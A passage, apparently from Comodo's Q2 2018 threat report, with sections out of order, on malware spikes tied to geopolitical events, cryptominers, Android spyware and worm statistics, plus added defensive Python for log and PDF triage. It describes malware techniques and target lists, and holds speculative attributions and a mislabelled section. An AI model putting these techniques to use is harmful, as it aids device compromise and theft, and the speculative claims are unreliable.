This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking (commonly called cyber espionage), which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the financial losses of the company were irreversible.
Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to a cryptominer's ability to elude antivirus software.
Below is another cunning technique that turns an infected machine into a slave of the attacker.
3.2 WinstarNssmMiner: a system killer
Like other cryptominers, WinstarNssmMiner is designed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system totally.
The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background looking for antivirus products and disables them.
The malicious code disguised as svchost.exe
Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victims' systems but also their cryptomining competitors.
3.3 CoinMiner kills rivals
CoinMiner stands out against other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.
CoinMiner kills its rivals as follows.
The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks if a miner is already running by testing for the presence of an "AMDDriver64" process.
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists, named $malwares and $malwares2, with the names of the processes that it is instructed to kill. The lists include other types of cryptominers.
In this way CoinMiner has the victim's computer to itself and uses its resources for mining cryptocurrency.
Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, which made them easier for users to detect. In Q2 these cryptominers learned to hide; CoinHive is the brightest example of them.
3.4 CoinHive changes its skin
CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.
As you can see, the CoinHive script is easily detected.
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports, users have started checking website code for cryptominers. But in the second quarter perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.
As a result, the malicious code on a webpage looks like this:
The obfuscated malicious code on a webpage
If we decode the string, we encounter an iframe.
The iframe loads the URL shortener. Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.
Now let's look at the URL https://cnhv.co
And there we can find the familiar link to CoinHive.
The link to CoinHive
What is the impact of this trick? In a simple scenario a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. The address is a long string combining different characters and numbers, so it is almost impossible to remember or fill in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.
Cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it replaces it with the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.
New Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses
This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added the malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack:
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining
Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.
If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.
Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It's distributed in three versions:
Version-1: Naver Defender
Version-2: Netease Defender
Version-3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional abilities for spying. It steals account details (contacts, id, name, phone numbers and email address of the owner). It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the "AES" algorithm and sends it to the attackers' server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control over the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.
Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.
Version-1: Dardesh (Google Play Services Instant Apps)
Version-2: Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim device.
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has 4 different versions:
Version-1: Telegram Groups, انتخاب دھم
Version-2: Postrall, Yes For Referendum, انتخاب دھم
Version-3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机
Version-4: VPN Easy, DroFirewall, m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attacker's server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.
The third version is included in spyware named "Spymaster Pro" and can:
Enable and disable the GPS services
Record audio and send it to the Command & Control server
Upload image files
Collect information about the applications installed
Collect browser's data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of previous versions, it includes some additional tricks:
Extracts photos, audio and video
Records the screen
Executes shell commands
Records calls
4.1.3 MikeSpy
Some spyware examples specifically hunt for messengers' data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend it has a bundle of malicious abilities:
Takes control over the Bluetooth Adapter
Extracts data about accounts, contact details and installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.
Version-1 to Version-3: FaceBook, Chrome
Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands:
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access a location specified by attackers
Make recordings
Make calls
4.1.5 Stalker Spy
The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.
App Distribution
FlexiSpy, MBackup
HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of the LokiBot Android banker. The second version of Mystery Bot is ransomware that encrypts files on external storage; after encryption the malware deletes the original files. So we can call it a spy with a "007 license".
Disguises of Mystery Bot: version 1, Adobe Flash Player; version 2, Flash Player
Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some of the commands the malware can execute on your device:
- Send_SMS: extract SMS content and send it to the C&C server
- Send_USSD: send the USSD to the C&C server
- Gethistory: monitor browser history
- Start_AllApp: gather information about installed applications
- Send_call: set the Intent action to place a call
- Forward_call: forward incoming calls
- ResForward_call: reset call forwarding
- Go_Smsmnd: delete SMS content
- Go_GetAlls: get SMS history
- Dell_sms: delete the SMS content in a conversation
- Send_spam: send spam SMS
- Start_Inject: call the injectors class
4.1.7 FakeSpy
FakeSpy also wears many masks, as the screenshot shows.
Disguises of FakeSpy: 佐川急便 (Sagawa Express), 현대캐피탈 (Hyundai Capital)
It collects all available information from the infected device and sends it to the C&C servers. It also checks for the presence of the following applications: aucomapp, softbankcomapp, docomocomapp.
Here are some commands from its command and control server:
- contacts: get contact details and email ID
- Mute: mute the device
- Mms: get MMS content
- info: get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" (cover identities) to win users' trust, wearing the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Disguises of RedAlert: version 1, EbookReader, Update Flash Player, Android Update, WhatsApp, Viber; version 2, Update Google Market, Flash Player, Tactic, FlashLight
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device for the following banking applications:
- de.postbank.finanzassistent
- pl.mbank
- aib.ibank.android
The second version can also block access to Google Chrome, the Google Play Store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, mostly operates on Iranian territory. It spreads through third-party app stores, social networks and messengers.
Disguises of Hero Rat (version 1): CloudVPN, MyIrancel, Mtproto, زیبانویس تلگرام (Telegram fancy-text writer), همه کاره (all-in-one), Proxy, دوست یاب (friend finder), Telegram Ton, شارژ رایگان بگیر (get free credit), App Master, Anti Rat, PlatformA, فالورگیر نامحدود (unlimited follower getter), اینترنت رایگان (free internet)
Its code is available on a Telegram hacking channel; notably, it is sold in three tiers: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run", but it keeps running in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects the device location and more. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram variants for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Disguises of Sonvpay (version 1): Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone
Sonvpay covertly subscribes the infected device to WAP and SMS services that add extra charges to the owner's mobile bill. Once installed, the malware displays a fake notification with a "skip" option; tapping it starts the malware working in the background, subscribing the user to services they never ordered. It reaches victims in the variety of disguises listed above.
4.1.11 CoinHive
The last one on our Q2 Android malware list is CoinHive. We mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which upgrades its mining capability. It is disseminated via the counterfeit apps listed below, but one of the vectors is especially interesting.
Disguises of CoinHive: version 1, Netflix Hack, Instagram Hack; version 2, TSF Launcher; version 3, Android Service, PlacarTv Futebol Ao Vivo
The malware is covertly propagated via ... another cryptominer, named CoinMiner.
How is that possible? Imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it on the victims' machines. However, she is not aware that another cybercriminal had earlier infected CoinMiner with CoinHive. So the first attacker is a victim too: thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below are detailed statistics on Android-targeted malware by month (bar charts, not reproduced in this transcript).
4.2.1 April 2018: Android-targeted malware in April (chart)
4.2.2 May 2018: Android-targeted malware in May (chart)
4.2.3 June 2018: Android-targeted malware in June (chart)
5 Malware in Q2 2018: The Big Picture
The visualization referred to here (not reproduced in this transcript) shows the malware activity Comodo detected in Q2 2018. It covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in exposed network services as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 report we place worms in a special category called "Strategic Threat" because of their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of worm infections.
And finally, the timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.
In Q2 2018 Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, while French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms spread as email attachments and links, and they are nasty in that they can also travel between victim computers via exploits and autorun functionality.
This quarter the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
The timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly used to share files such as unauthorized copies of books and films, and hackers take advantage of this to disseminate malware.
Polip was the most common p2p worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may leverage the Gnutella p2p protocol to distribute copies of itself.
The bubble chart clearly shows Russia as the primary home of p2p worms in Q2 2018.
And the timeline shows that Russia did not suffer from just one p2p worm outbreak but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, the "IM" or instant messaging worm, sends malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM worms that Comodo detected were in Iran, as illustrated in the bubble chart.
This particular IM worm was a variant of the well-known Yahos IM worm, whose use to spread banking malware via social networks led the FBI to announce the arrest of 10 people in 2012.
The timeline shows that while Comodo did not detect many IM worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common backdoor that Comodo detected in Q2 2018 was DarkComet, a remote access trojan (RAT) that is fully 10 years old. It allows a hacker to control a compromised system through a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo backdoor detections in Q2.
The UK's backdoor challenges are also apparent in the timeline. Expect a closer analysis of this British backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot reach another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking a hyperlink.
Ramnit was the top virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable (.exe) and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries, especially developing countries, were affected.
The timeline shows that Ukraine experienced two significant virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology because their malicious functionality is hidden within seemingly useful or benign programs. Typically trojans grant remote attackers the same rights and privileges as the local user and can be used for many kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on the victim system and adds it to the Administrators group as a "Remote Service Account".
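A detection check for the behaviour just described, written as an added example for this edition (it is not Comodo's code and not part of the original report): it replays a constructed JSON-lines export of Windows Security events and flags any account that is added to the BUILTIN\Administrators group within a few minutes of being created on the same host. The host name, account names, timestamps and the JSON field layout are assumptions made for the example; real exports from Windows Event Forwarding or a SIEM carry the same event IDs and SIDs but may name the fields differently.

```python
import json
from datetime import datetime, timedelta

# Well-known SID of the BUILTIN\Administrators group. It is identical on every
# Windows host, unlike the group name, which is localized.
ADMINISTRATORS_SID = "S-1-5-32-544"

# Constructed sample: a JSON-lines export of Security-log events trimmed to the
# fields this check needs. EventID 4720 = "a user account was created",
# EventID 4732 = "a member was added to a security-enabled local group".
# Host name, account names and timestamps are invented for the example.
SAMPLE_LOG = r"""
{"time": "2018-06-02T03:14:07", "EventID": 4720, "Computer": "WS-042", "SubjectUserName": "WS-042$", "TargetUserName": "RemoteSvc"}
{"time": "2018-06-02T03:14:09", "EventID": 4732, "Computer": "WS-042", "SubjectUserName": "WS-042$", "MemberName": "WS-042\\RemoteSvc", "TargetUserName": "Administrators", "TargetSid": "S-1-5-32-544"}
{"time": "2018-06-02T09:00:00", "EventID": 4720, "Computer": "WS-042", "SubjectUserName": "it.admin", "TargetUserName": "jsmith"}
{"time": "2018-06-02T09:00:05", "EventID": 4732, "Computer": "WS-042", "SubjectUserName": "it.admin", "MemberName": "WS-042\\jsmith", "TargetUserName": "Remote Desktop Users", "TargetSid": "S-1-5-32-555"}
{"time": "2018-06-03T11:22:00", "EventID": 4732, "Computer": "WS-042", "SubjectUserName": "it.admin", "MemberName": "WS-042\\jsmith", "TargetUserName": "Administrators", "TargetSid": "S-1-5-32-544"}
"""


def parse_events(log_text):
    """Parse JSON-lines events into dicts with a datetime 'time', oldest first."""
    events = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        ev["time"] = datetime.fromisoformat(ev["time"])
        events.append(ev)
    return sorted(events, key=lambda e: e["time"])


def bare_account(member_name):
    """Drop the HOST\\ or DOMAIN\\ prefix and normalise case: 'WS-042\\RemoteSvc' -> 'remotesvc'."""
    return member_name.rsplit("\\", 1)[-1].lower()


def find_created_then_admin(events, window=timedelta(minutes=10)):
    """Flag accounts added to Administrators within `window` of being created on the same host."""
    created = {}   # (computer, account) -> the 4720 event that created it
    alerts = []
    for ev in events:
        if ev["EventID"] == 4720:
            created[(ev["Computer"], ev["TargetUserName"].lower())] = ev
        elif ev["EventID"] == 4732 and ev.get("TargetSid") == ADMINISTRATORS_SID:
            key = (ev["Computer"], bare_account(ev["MemberName"]))
            creation = created.get(key)
            if creation is not None and ev["time"] - creation["time"] <= window:
                alerts.append({
                    "computer": ev["Computer"],
                    "account": creation["TargetUserName"],
                    "created_by": creation["SubjectUserName"],
                    "elevated_by": ev["SubjectUserName"],
                    "seconds_to_admin": (ev["time"] - creation["time"]).total_seconds(),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_created_then_admin(parse_events(SAMPLE_LOG)):
        print(alert)
```

The legitimate helpdesk sequence (jsmith created, added to Remote Desktop Users, promoted a day later) stays silent with the default 10-minute window; only the RemoteSvc account created and elevated two seconds apart by the machine account fires. Matching on the group SID rather than the name keeps the rule working on non-English Windows builds.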
The bubble chart shows that Germany (de) was the number one country for trojans according to Comodo detections.
And the timeline shows when this huge trojan infestation took place: at the beginning of June 2018.
5.2.4 Exploits
Exploits are software, chunks of data or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage the target software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
Exploit detections are comparatively rare, since the vulnerabilities they target are typically patched quickly once discovered.
In Q2 2018 the majority of exploits Comodo detected targeted a favorite hacker vehicle, Adobe Portable Document Format (PDF) files, a format created in the 1990s to present documents independently of application software, hardware and operating system.
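A static triage check of the kind analysts run against the PDF exploits discussed above, added here as an example (not code from the report or from Comodo): it counts the PDF name objects that give an attacker code execution or automatic actions, resolves the #xx hex escapes that malicious PDFs use to hide names such as /JavaScript from naive string scans, and produces a crude score. The two PDFs and the weights are constructed for the example; the approach is the one Didier Stevens' pdfid tool implements in more depth.

```python
import re
from collections import Counter

# Name tokens whose presence makes a PDF worth a closer look, with a weight for a
# crude score. The weights are this example's own choice, not a published scale.
RISKY_NAMES = {
    b"JavaScript": 3, b"JS": 3, b"Launch": 3,       # script or external program execution
    b"OpenAction": 2, b"AA": 2,                       # actions that fire without a click
    b"EmbeddedFile": 2, b"RichMedia": 2, b"XFA": 2,   # payload carriers
    b"AcroForm": 1,                                   # forms commonly host the script
}

# A PDF name object is "/" followed by regular characters; delimiters end it.
NAME_RE = re.compile(rb"/([^\s/<>\[\]()%{}]+)")
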